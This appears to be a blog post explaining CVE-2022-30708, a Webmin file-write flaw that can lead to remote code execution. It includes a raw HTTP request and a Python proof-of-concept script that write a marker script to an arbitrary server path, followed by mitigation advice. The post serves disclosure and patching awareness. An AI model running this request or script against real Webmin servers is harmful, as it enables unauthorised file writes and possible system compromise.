CVE-2022-30708 - Webmin Remote Code Execution Exploit Explained (with Example)

Webmin is a popular web-based system configuration tool used to simplify the management of servers. But, like all powerful tools, it can be dangerous if not kept up to date with security patches. In 2022, a major vulnerability was disclosed: CVE-2022-30708, which lets attackers execute code remotely under certain conditions.

This post walks you through what CVE-2022-30708 is, how it works, and provides a simple code snippet simulating an exploit—so you understand the risk and necessity of updating your software.

What's the Issue?

Webmin through version 1.991 is affected if you are running the Authentic theme (this is the default modern UI). If a user was created manually (not by Virtualmin or Cloudmin), that user might be able to abuse a flaw in settings-editor_write.cgi. That script takes a file parameter to let admins edit configuration files. The problem? It does not properly restrict which files can be specified with file.

That means, with a carefully crafted request, an attacker could use the web interface (or a direct HTTP request) to write malicious code to any file the Webmin server's user can access. Including, for example, files in /tmp or even files that, when called, let them execute code.

Reference:  
- Webmin Issue Tracker – Security Issue #2078
- NVD Entry for CVE-2022-30708

The Authentic theme is active

- The attacker has a manually created Webmin account (not created by Virtualmin/Cloudmin)

The dangerous code is found here

# settings-editor_write.cgi (snippet)
my $file = $in{'file'};
open(OUT, ">$file") || &error("Failed to open file for writing");
print OUT $in{'content'};
close(OUT);

Notice that the value for $file comes directly from user input. There's no filtering or proper validation here! That allows attackers to name any file they want (within permission limits).

Suppose the attacker has an account and logs in. They can send a POST request like this

POST /webmin/settings-editor_write.cgi HTTP/1.1
Host: target-site.com
Cookie: sid=ATTACKER_SESSION_ID
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

file=/tmp/myevilshell.pl&content=%23!%2Fusr%2Fbin%2Fperl%Asystem(%22touch+%2Ftmp%2Fpwned%22)%3B

Breaking that down

- file=/tmp/myevilshell.pl tells Webmin to write to /tmp/myevilshell.pl
- content=... contains a tiny Perl script: system("touch /tmp/pwned");

Once the file is written, if the attacker can get the server to run /tmp/myevilshell.pl (via some other exposure or by changing a cron job), the code will execute and create /tmp/pwned.

Here’s a tiny example in Python that does just that

import requests

url = 'https://target-site.com/webmin/settings-editor_write.cgi';
session = requests.Session()

# Authenticate first to get your session cookie (manual login or with requests)
cookies = {'sid': 'ATTACKER_SESSION_ID'}

payload = {
    'file': '/tmp/hacked.sh',
    'content': '#!/bin/bash\ntouch /tmp/pwned_by_webmin\n'
}

r = session.post(url, cookies=cookies, data=payload, verify=False)
print(f"Status code: {r.status_code}")
if r.status_code == 200:
    print("Wrote malicious script! Now try triggering its execution.")

Important: This script won’t work unless you have a valid session cookie and permissions.

Attackers with limited accounts can overwrite or create arbitrary files.

- If they can overwrite config files (like those for scheduled tasks or web server configs), it can turn into full remote code execution.
- In many practical cases, a chained exploit or weak configurations allow the attacker to escalate from Webmin access to full system compromise.

Mitigation Steps

1. Update Webmin to the latest version (see: Webmin official site).
2. Delete old/manual users no longer in use.

Final Thoughts

CVE-2022-30708 is a strong reminder to keep powerful admin tools like Webmin up-to-date and tightly controlled. Even "minor" features like editing settings can become major liabilities if left unchecked.

If you are using Webmin with the Authentic theme, have manually added users, and haven’t upgraded past 1.991—update now!


More reading:  
- NVD – CVE-2022-30708  
- Webmin official changelog


*If you liked this breakdown, consider securing your systems today!*

Timeline

Published on: 05/15/2022 03:15:00 UTC
Last modified on: 05/24/2022 17:19:00 UTC